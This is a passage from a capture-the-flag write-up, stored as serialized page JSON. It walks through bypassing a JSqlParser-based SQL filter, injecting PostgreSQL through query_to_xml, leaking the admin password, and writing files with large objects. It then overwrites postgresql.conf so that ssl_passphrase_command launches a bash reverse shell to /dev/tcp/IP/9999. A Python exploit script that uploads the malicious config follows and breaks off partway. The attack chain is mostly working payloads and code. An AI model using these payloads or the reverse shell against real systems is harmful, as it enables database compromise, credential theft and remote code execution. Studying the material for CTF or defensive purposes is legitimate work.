",{"type":32,"tag":79,"props":2376,"children":2378},{"className":2377},[],[2379],{"type":38,"value":2380},"Function",{"type":38,"value":2382}," type. So we need to trick the filter to make it believe that the object returned by allowed types.",{"type":32,"tag":47,"props":2384,"children":2385},{},[2386,2388,2394,2396,2402,2404,2409],{"type":38,"value":2387},"The left and right part is determined by the ",{"type":32,"tag":79,"props":2389,"children":2391},{"className":2390},[],[2392],{"type":38,"value":2393},"getLeft",{"type":38,"value":2395}," and ",{"type":32,"tag":79,"props":2397,"children":2399},{"className":2398},[],[2400],{"type":38,"value":2401},"getRight",{"type":38,"value":2403}," function of the library ",{"type":32,"tag":79,"props":2405,"children":2407},{"className":2406},[],[2408],{"type":38,"value":1840},{"type":38,"value":629},{"type":32,"tag":47,"props":2411,"children":2412},{},[2413],{"type":38,"value":2414},"For example if we submit the following query:",{"type":32,"tag":68,"props":2416,"children":2417},{"lang":515},[2418],{"type":32,"tag":73,"props":2419,"children":2421},{"code":2420},"username=a'||'b'||'c'||'d&passwd=a\n",[2422],{"type":32,"tag":79,"props":2423,"children":2424},{"__ignoreMap":7},[2425],{"type":38,"value":2420},{"type":32,"tag":47,"props":2427,"children":2428},{},[2429,2431,2437,2439,2445],{"type":38,"value":2430},"If we add a bit of debugging, we can see that at the end of the recursion, the left part will be ",{"type":32,"tag":79,"props":2432,"children":2434},{"className":2433},[],[2435],{"type":38,"value":2436},"a",{"type":38,"value":2438}," and the right part will be ",{"type":32,"tag":79,"props":2440,"children":2442},{"className":2441},[],[2443],{"type":38,"value":2444},"b",{"type":38,"value":2446},". It means that c and d are not processed by the check function.",{"type":32,"tag":68,"props":2448,"children":2449},{"lang":515},[2450],{"type":32,"tag":73,"props":2451,"children":2453},{"code":2452,"language":515,"meta":7,"className":2293,"style":7},"app-1  | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] left_expr: 'A'\napp-1  | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] right_expr: 'B'\napp-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || 'C' || 'D'\n",[2454],{"type":32,"tag":79,"props":2455,"children":2456},{"__ignoreMap":7},[2457,2465,2473,2481,2489],{"type":32,"tag":83,"props":2458,"children":2459},{"class":85,"line":86},[2460],{"type":32,"tag":83,"props":2461,"children":2462},{},[2463],{"type":38,"value":2464},"app-1  | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\n",{"type":32,"tag":83,"props":2466,"children":2467},{"class":85,"line":102},[2468],{"type":32,"tag":83,"props":2469,"children":2470},{},[2471],{"type":38,"value":2472},"app-1  | [SQLParser.restrictExpr] left_expr: 'A'\n",{"type":32,"tag":83,"props":2474,"children":2475},{"class":85,"line":112},[2476],{"type":32,"tag":83,"props":2477,"children":2478},{},[2479],{"type":38,"value":2480},"app-1  | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\n",{"type":32,"tag":83,"props":2482,"children":2483},{"class":85,"line":126},[2484],{"type":32,"tag":83,"props":2485,"children":2486},{},[2487],{"type":38,"value":2488},"app-1  | [SQLParser.restrictExpr] right_expr: 'B'\n",{"type":32,"tag":83,"props":2490,"children":2491},{"class":85,"line":135},[2492],{"type":32,"tag":83,"props":2493,"children":2494},{},[2495],{"type":38,"value":2496},"app-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || 'C' || 'D'\n",{"type":32,"tag":47,"props":2498,"children":2499},{},[2500,2502,2508],{"type":38,"value":2501},"And we can see that both parts are indeed of type ",{"type":32,"tag":79,"props":2503,"children":2505},{"className":2504},[],[2506],{"type":38,"value":2507},"StringValue",{"type":38,"value":629},{"type":32,"tag":47,"props":2510,"children":2511},{},[2512],{"type":38,"value":2513},"So we can inject what we want in the right part provided it's concatenated with a string like this:",{"type":32,"tag":68,"props":2515,"children":2516},{"lang":515},[2517],{"type":32,"tag":73,"props":2518,"children":2520},{"code":2519},"username=a'||'b'||INJECTION||'&passwd=a\n",[2521],{"type":32,"tag":79,"props":2522,"children":2523},{"__ignoreMap":7},[2524],{"type":38,"value":2519},{"type":32,"tag":47,"props":2526,"children":2527},{},[2528,2530,2536],{"type":38,"value":2529},"We can try with a simple injection like ",{"type":32,"tag":79,"props":2531,"children":2533},{"className":2532},[],[2534],{"type":38,"value":2535},"Select 1",{"type":38,"value":2537},":",{"type":32,"tag":68,"props":2539,"children":2540},{"lang":515},[2541],{"type":32,"tag":73,"props":2542,"children":2544},{"code":2543},"username=a'||'b'||query_to_xml(chr(115)||chr(101)||chr(108)||chr(101)||chr(99)||chr(116)||chr(32)||chr(49),true,true,'')||'&passwd=a\n",[2545],{"type":32,"tag":79,"props":2546,"children":2547},{"__ignoreMap":7},[2548],{"type":38,"value":2543},{"type":32,"tag":47,"props":2550,"children":2551},{},[2552],{"type":38,"value":2553},"We can see in the logs that the query is accepted by the filter.",{"type":32,"tag":68,"props":2555,"children":2556},{"lang":515},[2557],{"type":32,"tag":73,"props":2558,"children":2560},{"code":2559,"language":515,"meta":7,"className":2293,"style":7},"app-1  | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] left_expr: 'A'\napp-1  | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] right_expr: 'B'\napp-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || QUERY_TO_XML(CHR(115) || CHR(101) || CHR(108) || CHR(101) || CHR(99) || CHR(116) || CHR(32) || CHR(49), TRUE, TRUE, '') || ''\n",[2561],{"type":32,"tag":79,"props":2562,"children":2563},{"__ignoreMap":7},[2564,2571,2578,2585,2592],{"type":32,"tag":83,"props":2565,"children":2566},{"class":85,"line":86},[2567],{"type":32,"tag":83,"props":2568,"children":2569},{},[2570],{"type":38,"value":2464},{"type":32,"tag":83,"props":2572,"children":2573},{"class":85,"line":102},[2574],{"type":32,"tag":83,"props":2575,"children":2576},{},[2577],{"type":38,"value":2472},{"type":32,"tag":83,"props":2579,"children":2580},{"class":85,"line":112},[2581],{"type":32,"tag":83,"props":2582,"children":2583},{},[2584],{"type":38,"value":2480},{"type":32,"tag":83,"props":2586,"children":2587},{"class":85,"line":126},[2588],{"type":32,"tag":83,"props":2589,"children":2590},{},[2591],{"type":38,"value":2488},{"type":32,"tag":83,"props":2593,"children":2594},{"class":85,"line":135},[2595],{"type":32,"tag":83,"props":2596,"children":2597},{},[2598],{"type":38,"value":2599},"app-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || QUERY_TO_XML(CHR(115) || CHR(101) || CHR(108) || CHR(101) || CHR(99) || CHR(116) || CHR(32) || CHR(49), TRUE, TRUE, '') || ''\n",{"type":32,"tag":47,"props":2601,"children":2602},{},[2603],{"type":38,"value":2604},"On the return of the request we can also see we don't have any error message telling us that the query is not accepted. So we can say that the query is accepted by the filter.",{"type":32,"tag":57,"props":2606,"children":2608},{"imgSrc":2607},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559128/writeups/chatter-box/sqli_ok.webp",[],{"type":32,"tag":40,"props":2610,"children":2612},{"id":2611},"from-postgresqli-to-rce-unintended",[2613],{"type":38,"value":2614},"From postgreSQLI to RCE [UNINTENDED]",{"type":32,"tag":47,"props":2616,"children":2617},{},[2618],{"type":38,"value":2619},"No we can easily leak password of admin user, with visible sql error, with a payload like this:",{"type":32,"tag":68,"props":2621,"children":2622},{"lang":515},[2623],{"type":32,"tag":73,"props":2624,"children":2626},{"code":2625},"(SELECT CAST((SELECT passwd FROM message_users LIMIT 1) AS int))\n",[2627],{"type":32,"tag":79,"props":2628,"children":2629},{"__ignoreMap":7},[2630],{"type":38,"value":2625},{"type":32,"tag":47,"props":2632,"children":2633},{},[2634,2636,2642,2643,2649],{"type":38,"value":2635},"But after several hours of research on the other controllers (",{"type":32,"tag":79,"props":2637,"children":2639},{"className":2638},[],[2640],{"type":38,"value":2641},"NotifyController",{"type":38,"value":2395},{"type":32,"tag":79,"props":2644,"children":2646},{"className":2645},[],[2647],{"type":38,"value":2648},"MessageBoardController",{"type":38,"value":2650},"). We was not able to go further. So we thought that these controllers were rabbit-holes.",{"type":32,"tag":47,"props":2652,"children":2653},{},[2654],{"type":38,"value":2655},"So we tried to research how to deepen the SQL injection in order to execute code on the server.",{"type":32,"tag":47,"props":2657,"children":2658},{},[2659],{"type":38,"value":2660},"So now we can ask ourselves, from a select statement in postgresql how can we interact with the server in order to compromise it and execute code?",{"type":32,"tag":497,"props":2662,"children":2664},{"id":2663},"arbitrary-file-write-read",[2665],{"type":38,"value":2666},"Arbitrary file write / read",{"type":32,"tag":47,"props":2668,"children":2669},{},[2670],{"type":38,"value":2671},"PostgreSQL's large object facility offers stream-style access to user data stored in a specialized large-object structure. This streaming access proves valuable when dealing with data values that are impractical to manipulate as a complete entity due to their size.",{"type":32,"tag":47,"props":2673,"children":2674},{},[2675],{"type":38,"value":2676},"Thus, we can read and write files on the server using large objects.",{"type":32,"tag":47,"props":2678,"children":2679},{},[2680,2682,2688,2690,2696],{"type":38,"value":2681},"Unfortunately, the postgres user of the docker does not have the necessary rights to read the ",{"type":32,"tag":79,"props":2683,"children":2685},{"className":2684},[],[2686],{"type":38,"value":2687},"/flag",{"type":38,"value":2689}," file, so we must at all costs execute the elf ",{"type":32,"tag":79,"props":2691,"children":2693},{"className":2692},[],[2694],{"type":38,"value":2695},"/readflag",{"type":38,"value":629},{"type":32,"tag":47,"props":2698,"children":2699},{},[2700],{"type":38,"value":2701},"So we will focus on how to write files to the server:",{"type":32,"tag":47,"props":2703,"children":2704},{},[2705,2707,2713,2715,2721],{"type":38,"value":2706},"For this, we must use the ",{"type":32,"tag":79,"props":2708,"children":2710},{"className":2709},[],[2711],{"type":38,"value":2712},"lo_frombytea",{"type":38,"value":2714}," function, which allows writing to a large postgresql object and finally call the ",{"type":32,"tag":79,"props":2716,"children":2718},{"className":2717},[],[2719],{"type":38,"value":2720},"lo_export",{"type":38,"value":2722}," function with the path that allows writing the large object to the server disk.",{"type":32,"tag":68,"props":2724,"children":2725},{"lang":7},[2726],{"type":32,"tag":73,"props":2727,"children":2729},{"code":2728},"SELECT lo_from_bytea(10000, decode('cHduZWQK', 'base64'))\nSELECT lo_export(10000, '/tmp/pwn')\n",[2730],{"type":32,"tag":79,"props":2731,"children":2732},{"__ignoreMap":7},[2733],{"type":38,"value":2728},{"type":32,"tag":47,"props":2735,"children":2736},{},[2737],{"type":38,"value":2738},"Note that both functions take as a first parameter an identifier, allowing to identify a large object, it is possible to put any identifier as long as it is not already used.",{"type":32,"tag":47,"props":2740,"children":2741},{},[2742],{"type":38,"value":2743},"After executing these two functions, we can see that the /tmp/pwn file has been successfully created with its content",{"type":32,"tag":57,"props":2745,"children":2747},{"imgSrc":2746,":width":356},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559178/writeups/chatter-box/file_write_pwn.webp",[],{"type":32,"tag":47,"props":2749,"children":2750},{},[2751],{"type":38,"value":2752},"We now have a POC that allows writing files to the system. Also note that these functions can also allow rewriting a file already created.",{"type":32,"tag":497,"props":2754,"children":2756},{"id":2755},"postgresqlconf",[2757],{"type":38,"value":2758},"postgresql.conf",{"type":32,"tag":47,"props":2760,"children":2761},{},[2762,2764,2769],{"type":38,"value":2763},"Once we have been able to rewrite files, we may ask ourselves which file would be interesting to rewrite? The ",{"type":32,"tag":79,"props":2765,"children":2767},{"className":2766},[],[2768],{"type":38,"value":2758},{"type":38,"value":2770}," file of course !!",{"type":32,"tag":47,"props":2772,"children":2773},{},[2774],{"type":38,"value":2775},"An interesting option in the postgresql configuration is the \"ssl_passphrase_command\" option.",{"type":32,"tag":57,"props":2777,"children":2779},{"imgSrc":2778,":width":356},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559212/writeups/chatter-box/doc_passphrase_command.webp",[],{"type":32,"tag":47,"props":2781,"children":2782},{},[2783],{"type":38,"value":2784},"This option allows to execute a command if the ssl key is encrypted with a passphrase.",{"type":32,"tag":47,"props":2786,"children":2787},{},[2788],{"type":38,"value":2789},"We must therefore generate a new key that includes a passphrase, so we will use the following command:",{"type":32,"tag":68,"props":2791,"children":2793},{"lang":2792},"bash",[2794],{"type":32,"tag":73,"props":2795,"children":2798},{"code":2796,"language":2792,"meta":7,"className":2797,"style":7},"openssl rsa -aes256 -in /etc/ssl/private/ssl-cert-snakeoil.key -out ./my_new_key\n","language-bash shiki shiki-themes vitesse-dark",[2799],{"type":32,"tag":79,"props":2800,"children":2801},{"__ignoreMap":7},[2802],{"type":32,"tag":83,"props":2803,"children":2804},{"class":85,"line":86},[2805,2810,2815,2820,2825,2830,2835],{"type":32,"tag":83,"props":2806,"children":2807},{"style":576},[2808],{"type":38,"value":2809},"openssl",{"type":32,"tag":83,"props":2811,"children":2812},{"style":338},[2813],{"type":38,"value":2814}," rsa",{"type":32,"tag":83,"props":2816,"children":2817},{"style":651},[2818],{"type":38,"value":2819}," -aes256",{"type":32,"tag":83,"props":2821,"children":2822},{"style":651},[2823],{"type":38,"value":2824}," -in",{"type":32,"tag":83,"props":2826,"children":2827},{"style":338},[2828],{"type":38,"value":2829}," /etc/ssl/private/ssl-cert-snakeoil.key",{"type":32,"tag":83,"props":2831,"children":2832},{"style":651},[2833],{"type":38,"value":2834}," -out",{"type":32,"tag":83,"props":2836,"children":2837},{"style":338},[2838],{"type":38,"value":2839}," ./my_new_key\n",{"type":32,"tag":47,"props":2841,"children":2842},{},[2843],{"type":38,"value":2844},"Result of the command:",{"type":32,"tag":57,"props":2846,"children":2848},{"imgSrc":2847},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559241/writeups/chatter-box/rsa_command.webp",[],{"type":32,"tag":47,"props":2850,"children":2851},{},[2852],{"type":38,"value":2853},"Once our key is generated, we must find a file to rewrite with 600 rights. If our file containing the key does not have these rights then the server will not accept it will raise an exception.",{"type":32,"tag":47,"props":2855,"children":2856},{},[2857],{"type":38,"value":2858},"To search this specifics files we use the following command:",{"type":32,"tag":68,"props":2860,"children":2861},{"lang":2792},[2862],{"type":32,"tag":73,"props":2863,"children":2865},{"code":2864,"language":2792,"meta":7,"className":2797,"style":7},"find /var/lib/postgresql/13/ -type f -perm 600 -user postgres -writable 2>&-\n",[2866],{"type":32,"tag":79,"props":2867,"children":2868},{"__ignoreMap":7},[2869],{"type":32,"tag":83,"props":2870,"children":2871},{"class":85,"line":86},[2872,2877,2882,2887,2892,2897,2902,2907,2912,2917,2922],{"type":32,"tag":83,"props":2873,"children":2874},{"style":576},[2875],{"type":38,"value":2876},"find",{"type":32,"tag":83,"props":2878,"children":2879},{"style":338},[2880],{"type":38,"value":2881}," /var/lib/postgresql/13/",{"type":32,"tag":83,"props":2883,"children":2884},{"style":651},[2885],{"type":38,"value":2886}," -type",{"type":32,"tag":83,"props":2888,"children":2889},{"style":338},[2890],{"type":38,"value":2891}," f",{"type":32,"tag":83,"props":2893,"children":2894},{"style":651},[2895],{"type":38,"value":2896}," -perm",{"type":32,"tag":83,"props":2898,"children":2899},{"style":720},[2900],{"type":38,"value":2901}," 600",{"type":32,"tag":83,"props":2903,"children":2904},{"style":651},[2905],{"type":38,"value":2906}," -user",{"type":32,"tag":83,"props":2908,"children":2909},{"style":338},[2910],{"type":38,"value":2911}," postgres",{"type":32,"tag":83,"props":2913,"children":2914},{"style":651},[2915],{"type":38,"value":2916}," -writable",{"type":32,"tag":83,"props":2918,"children":2919},{"style":455},[2920],{"type":38,"value":2921}," 2>&",{"type":32,"tag":83,"props":2923,"children":2924},{"style":338},[2925],{"type":38,"value":2926},"-\n",{"type":32,"tag":47,"props":2928,"children":2929},{},[2930],{"type":38,"value":2844},{"type":32,"tag":57,"props":2932,"children":2934},{"imgSrc":2933},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559268/writeups/chatter-box/find_command.webp",[],{"type":32,"tag":47,"props":2936,"children":2937},{},[2938,2940,2946],{"type":38,"value":2939},"So the most interesting file in our case is the ",{"type":32,"tag":79,"props":2941,"children":2943},{"className":2942},[],[2944],{"type":38,"value":2945},"PG_VERSION",{"type":38,"value":2947}," file. After our upload it will contain the content of our key.",{"type":32,"tag":47,"props":2949,"children":2950},{},[2951],{"type":38,"value":2952},"Our postgresql configuration will be as follows:",{"type":32,"tag":68,"props":2954,"children":2956},{"lang":2955},"conf",[2957],{"type":32,"tag":73,"props":2958,"children":2961},{"code":2959,"language":2955,"meta":7,"className":2960,"style":7},"# - SSL -\n\nssl = on\nssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'\nssl_key_file = '/var/lib/postgresql/13/main/PG_VERSION'\nssl_passphrase_command_supports_reload = on\nssl_passphrase_command = '/bin/bash -c \"/bin/bash -i >& /dev/tcp/IP/9999 0>&1\"'\n","language-conf shiki shiki-themes vitesse-dark",[2962],{"type":32,"tag":79,"props":2963,"children":2964},{"__ignoreMap":7},[2965,2973,2980,2988,2996,3004,3012],{"type":32,"tag":83,"props":2966,"children":2967},{"class":85,"line":86},[2968],{"type":32,"tag":83,"props":2969,"children":2970},{},[2971],{"type":38,"value":2972},"# - SSL -\n",{"type":32,"tag":83,"props":2974,"children":2975},{"class":85,"line":102},[2976],{"type":32,"tag":83,"props":2977,"children":2978},{"emptyLinePlaceholder":106},[2979],{"type":38,"value":109},{"type":32,"tag":83,"props":2981,"children":2982},{"class":85,"line":112},[2983],{"type":32,"tag":83,"props":2984,"children":2985},{},[2986],{"type":38,"value":2987},"ssl = on\n",{"type":32,"tag":83,"props":2989,"children":2990},{"class":85,"line":126},[2991],{"type":32,"tag":83,"props":2992,"children":2993},{},[2994],{"type":38,"value":2995},"ssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'\n",{"type":32,"tag":83,"props":2997,"children":2998},{"class":85,"line":135},[2999],{"type":32,"tag":83,"props":3000,"children":3001},{},[3002],{"type":38,"value":3003},"ssl_key_file = '/var/lib/postgresql/13/main/PG_VERSION'\n",{"type":32,"tag":83,"props":3005,"children":3006},{"class":85,"line":148},[3007],{"type":32,"tag":83,"props":3008,"children":3009},{},[3010],{"type":38,"value":3011},"ssl_passphrase_command_supports_reload = on\n",{"type":32,"tag":83,"props":3013,"children":3014},{"class":85,"line":161},[3015],{"type":32,"tag":83,"props":3016,"children":3017},{},[3018],{"type":38,"value":3019},"ssl_passphrase_command = '/bin/bash -c \"/bin/bash -i >& /dev/tcp/IP/9999 0>&1\"'\n",{"type":32,"tag":47,"props":3021,"children":3022},{},[3023],{"type":38,"value":3024},"Once our configuration is uploaded, we will need to reload the postgresql configuration. To do this, we can simply call the pg_reload_conf function which will have the effect of applying the new config.",{"type":32,"tag":40,"props":3026,"children":3028},{"id":3027},"final-payload",[3029],{"type":38,"value":3030},"Final payload",{"type":32,"tag":47,"props":3032,"children":3033},{},[3034],{"type":38,"value":3035},"So to get our RCE we are going to do this step by step:",{"type":32,"tag":364,"props":3037,"children":3038},{},[3039],{"type":32,"tag":368,"props":3040,"children":3041},{},[3042],{"type":38,"value":3043},"Upload the malicious configuration:",{"type":32,"tag":68,"props":3045,"children":3046},{"lang":556},[3047],{"type":32,"tag":73,"props":3048,"children":3050},{"code":3049,"language":556,"meta":7,"className":561,"style":7},"rand_num = random.randint(31337, 31337*5)\n    \nwith open(\"files/conf.b64\", \"r\") as f:\n    conf = f.read()\n\nquery = get_payload(f\"(SELECT lo_from_bytea({rand_num}, decode('{conf}', 'base64')))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\nquery = get_payload(f\"(SELECT lo_export({rand_num}, '/etc/postgresql/13/main/postgresql.conf'))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\n",[3051],{"type":32,"tag":79,"props":3052,"children":3053},{"__ignoreMap":7},[3054,3112,3120,3185,3215,3222,3290,3398,3447],{"type":32,"tag":83,"props":3055,"children":3056},{"class":85,"line":86},[3057,3062,3066,3071,3075,3080,3084,3089,3093,3098,3103,3108],{"type":32,"tag":83,"props":3058,"children":3059},{"style":96},[3060],{"type":38,"value":3061},"rand_num ",{"type":32,"tag":83,"props":3063,"children":3064},{"style":433},[3065],{"type":38,"value":607},{"type":32,"tag":83,"props":3067,"children":3068},{"style":96},[3069],{"type":38,"value":3070}," random",{"type":32,"tag":83,"props":3072,"children":3073},{"style":433},[3074],{"type":38,"value":629},{"type":32,"tag":83,"props":3076,"children":3077},{"style":96},[3078],{"type":38,"value":3079},"randint",{"type":32,"tag":83,"props":3081,"children":3082},{"style":433},[3083],{"type":38,"value":584},{"type":32,"tag":83,"props":3085,"children":3086},{"style":720},[3087],{"type":38,"value":3088},"31337",{"type":32,"tag":83,"props":3090,"children":3091},{"style":433},[3092],{"type":38,"value":728},{"type":32,"tag":83,"props":3094,"children":3095},{"style":720},[3096],{"type":38,"value":3097}," 31337",{"type":32,"tag":83,"props":3099,"children":3100},{"style":455},[3101],{"type":38,"value":3102},"*",{"type":32,"tag":83,"props":3104,"children":3105},{"style":720},[3106],{"type":38,"value":3107},"5",{"type":32,"tag":83,"props":3109,"children":3110},{"style":433},[3111],{"type":38,"value":798},{"type":32,"tag":83,"props":3113,"children":3114},{"class":85,"line":102},[3115],{"type":32,"tag":83,"props":3116,"children":3117},{"style":96},[3118],{"type":38,"value":3119},"    \n",{"type":32,"tag":83,"props":3121,"children":3122},{"class":85,"line":112},[3123,3128,3133,3137,3141,3146,3150,3154,3158,3163,3167,3171,3176,3180],{"type":32,"tag":83,"props":3124,"children":3125},{"style":90},[3126],{"type":38,"value":3127},"with",{"type":32,"tag":83,"props":3129,"children":3130},{"style":657},[3131],{"type":38,"value":3132}," open",{"type":32,"tag":83,"props":3134,"children":3135},{"style":433},[3136],{"type":38,"value":584},{"type":32,"tag":83,"props":3138,"children":3139},{"style":439},[3140],{"type":38,"value":452},{"type":32,"tag":83,"props":3142,"children":3143},{"style":338},[3144],{"type":38,"value":3145},"files/conf.b64",{"type":32,"tag":83,"props":3147,"children":3148},{"style":439},[3149],{"type":38,"value":452},{"type":32,"tag":83,"props":3151,"children":3152},{"style":433},[3153],{"type":38,"value":728},{"type":32,"tag":83,"props":3155,"children":3156},{"style":439},[3157],{"type":38,"value":442},{"type":32,"tag":83,"props":3159,"children":3160},{"style":338},[3161],{"type":38,"value":3162},"r",{"type":32,"tag":83,"props":3164,"children":3165},{"style":439},[3166],{"type":38,"value":452},{"type":32,"tag":83,"props":3168,"children":3169},{"style":433},[3170],{"type":38,"value":869},{"type":32,"tag":83,"props":3172,"children":3173},{"style":90},[3174],{"type":38,"value":3175}," as",{"type":32,"tag":83,"props":3177,"children":3178},{"style":96},[3179],{"type":38,"value":2891},{"type":32,"tag":83,"props":3181,"children":3182},{"style":433},[3183],{"type":38,"value":3184},":\n",{"type":32,"tag":83,"props":3186,"children":3187},{"class":85,"line":126},[3188,3193,3197,3201,3205,3210],{"type":32,"tag":83,"props":3189,"children":3190},{"style":96},[3191],{"type":38,"value":3192},"    conf ",{"type":32,"tag":83,"props":3194,"children":3195},{"style":433},[3196],{"type":38,"value":607},{"type":32,"tag":83,"props":3198,"children":3199},{"style":96},[3200],{"type":38,"value":2891},{"type":32,"tag":83,"props":3202,"children":3203},{"style":433},[3204],{"type":38,"value":629},{"type":32,"tag":83,"props":3206,"children":3207},{"style":96},[3208],{"type":38,"value":3209},"read",{"type":32,"tag":83,"props":3211,"children":3212},{"style":433},[3213],{"type":38,"value":3214},"()\n",{"type":32,"tag":83,"props":3216,"children":3217},{"class":85,"line":135},[3218],{"type":32,"tag":83,"props":3219,"children":3220},{"emptyLinePlaceholder":106},[3221],{"type":38,"value":109},{"type":32,"tag":83,"props":3223,"children":3224},{"class":85,"line":148},[3225,3230,3234,3238,3242,3246,3251,3255,3260,3264,3269,3273,3277,3281,3286],{"type":32,"tag":83,"props":3226,"children":3227},{"style":96},[3228],{"type":38,"value":3229},"query ",{"type":32,"tag":83,"props":3231,"children":3232},{"style":433},[3233],{"type":38,"value":607},{"type":32,"tag":83,"props":3235,"children":3236},{"style":96},[3237],{"type":38,"value":579},{"type":32,"tag":83,"props":3239,"children":3240},{"style":433},[3241],{"type":38,"value":584},{"type":32,"tag":83,"props":3243,"children":3244},{"style":455},[3245],{"type":38,"value":643},{"type":32,"tag":83,"props":3247,"children":3248},{"style":338},[3249],{"type":38,"value":3250},"\"(SELECT lo_from_bytea(",{"type":32,"tag":83,"props":3252,"children":3253},{"style":651},[3254],{"type":38,"value":654},{"type":32,"tag":83,"props":3256,"children":3257},{"style":96},[3258],{"type":38,"value":3259},"rand_num",{"type":32,"tag":83,"props":3261,"children":3262},{"style":651},[3263],{"type":38,"value":688},{"type":32,"tag":83,"props":3265,"children":3266},{"style":338},[3267],{"type":38,"value":3268},", decode('",{"type":32,"tag":83,"props":3270,"children":3271},{"style":651},[3272],{"type":38,"value":654},{"type":32,"tag":83,"props":3274,"children":3275},{"style":96},[3276],{"type":38,"value":2955},{"type":32,"tag":83,"props":3278,"children":3279},{"style":651},[3280],{"type":38,"value":688},{"type":32,"tag":83,"props":3282,"children":3283},{"style":338},[3284],{"type":38,"value":3285},"', 'base64')))\"",{"type":32,"tag":83,"props":3287,"children":3288},{"style":433},[3289],{"type":38,"value":798},{"type":32,"tag":83,"props":3291,"children":3292},{"class":85,"line":161},[3293,3298,3302,3307,3311,3316,3320,3325,3329,3334,3338,3342,3347,3351,3355,3359,3363,3367,3372,3376,3380,3385,3389,3394],{"type":32,"tag":83,"props":3294,"children":3295},{"style":96},[3296],{"type":38,"value":3297},"r ",{"type":32,"tag":83,"props":3299,"children":3300},{"style":433},[3301],{"type":38,"value":607},{"type":32,"tag":83,"props":3303,"children":3304},{"style":96},[3305],{"type":38,"value":3306}," requests",{"type":32,"tag":83,"props":3308,"children":3309},{"style":433},[3310],{"type":38,"value":629},{"type":32,"tag":83,"props":3312,"children":3313},{"style":96},[3314],{"type":38,"value":3315},"post",{"type":32,"tag":83,"props":3317,"children":3318},{"style":433},[3319],{"type":38,"value":584},{"type":32,"tag":83,"props":3321,"children":3322},{"style":651},[3323],{"type":38,"value":3324},"URL_TARGET",{"type":32,"tag":83,"props":3326,"children":3327},{"style":433},[3328],{"type":38,"value":728},{"type":32,"tag":83,"props":3330,"children":3331},{"style":427},[3332],{"type":38,"value":3333}," data",{"type":32,"tag":83,"props":3335,"children":3336},{"style":433},[3337],{"type":38,"value":607},{"type":32,"tag":83,"props":3339,"children":3340},{"style":439},[3341],{"type":38,"value":452},{"type":32,"tag":83,"props":3343,"children":3344},{"style":338},[3345],{"type":38,"value":3346},"username=",{"type":32,"tag":83,"props":3348,"children":3349},{"style":439},[3350],{"type":38,"value":452},{"type":32,"tag":83,"props":3352,"children":3353},{"style":455},[3354],{"type":38,"value":468},{"type":32,"tag":83,"props":3356,"children":3357},{"style":96},[3358],{"type":38,"value":589},{"type":32,"tag":83,"props":3360,"children":3361},{"style":455},[3362],{"type":38,"value":468},{"type":32,"tag":83,"props":3364,"children":3365},{"style":439},[3366],{"type":38,"value":452},{"type":32,"tag":83,"props":3368,"children":3369},{"style":338},[3370],{"type":38,"value":3371},"&passwd=admin",{"type":32,"tag":83,"props":3373,"children":3374},{"style":439},[3375],{"type":38,"value":452},{"type":32,"tag":83,"props":3377,"children":3378},{"style":433},[3379],{"type":38,"value":728},{"type":32,"tag":83,"props":3381,"children":3382},{"style":427},[3383],{"type":38,"value":3384}," headers",{"type":32,"tag":83,"props":3386,"children":3387},{"style":433},[3388],{"type":38,"value":607},{"type":32,"tag":83,"props":3390,"children":3391},{"style":96},[3392],{"type":38,"value":3393},"headers",{"type":32,"tag":83,"props":3395,"children":3396},{"style":433},[3397],{"type":38,"value":798},{"type":32,"tag":83,"props":3399,"children":3400},{"class":85,"line":169},[3401,3405,3409,3413,3417,3421,3426,3430,3434,3438,3443],{"type":32,"tag":83,"props":3402,"children":3403},{"style":96},[3404],{"type":38,"value":3229},{"type":32,"tag":83,"props":3406,"children":3407},{"style":433},[3408],{"type":38,"value":607},{"type":32,"tag":83,"props":3410,"children":3411},{"style":96},[3412],{"type":38,"value":579},{"type":32,"tag":83,"props":3414,"children":3415},{"style":433},[3416],{"type":38,"value":584},{"type":32,"tag":83,"props":3418,"children":3419},{"style":455},[3420],{"type":38,"value":643},{"type":32,"tag":83,"props":3422,"children":3423},{"style":338},[3424],{"type":38,"value":3425},"\"(SELECT lo_export(",{"type":32,"tag":83,"props":3427,"children":3428},{"style":651},[3429],{"type":38,"value":654},{"type":32,"tag":83,"props":3431,"children":3432},{"style":96},[3433],{"type":38,"value":3259},{"type":32,"tag":83,"props":3435,"children":3436},{"style":651},[3437],{"type":38,"value":688},{"type":32,"tag":83,"props":3439,"children":3440},{"style":338},[3441],{"type":38,"value":3442},", 